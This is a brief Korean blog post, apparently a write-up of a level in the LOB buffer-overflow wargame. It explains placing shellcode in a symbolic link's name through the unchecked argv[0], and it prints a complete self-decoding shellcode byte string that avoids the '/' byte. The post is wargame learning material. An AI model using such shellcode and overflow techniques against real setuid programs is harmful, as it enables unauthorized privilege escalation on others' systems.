이번에는 받는 인자가 두개로 제한되어있고 거기에 argv[1]까지 제한해준다. 다만 argv[0]의 길이는 검사하지 않음으로, 아무래도 심볼릭링크에 쉘코드를 삽입하고 권한을 따줘야 할듯 싶다...
안되서 찾아보니 \x2f가 '/'여서 안된다더라
쉘코드를 다시 만들어야겠지만..귀찮음으로...
\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81
https://d4m0n.tistory.com/62
해당 블로그를 참고해 다음에 만들어 보자.
주소를 찾아주고.
생각보다 쉽게 땄다.
'war game > LOB' 카테고리의 다른 글
LOB-level10(argv hunter) (0) | 2019.06.30 |
---|---|
LOB-level9(check 0xbfff) (0) | 2019.06.29 |
LOB-level7(check argv[0]) (0) | 2019.06.28 |
LOB-level6(check length of argv[1] + egghunter + bufferhunter) (0) | 2019.06.28 |
LOB-level5(egghunter + bufferhunter) (0) | 2019.06.24 |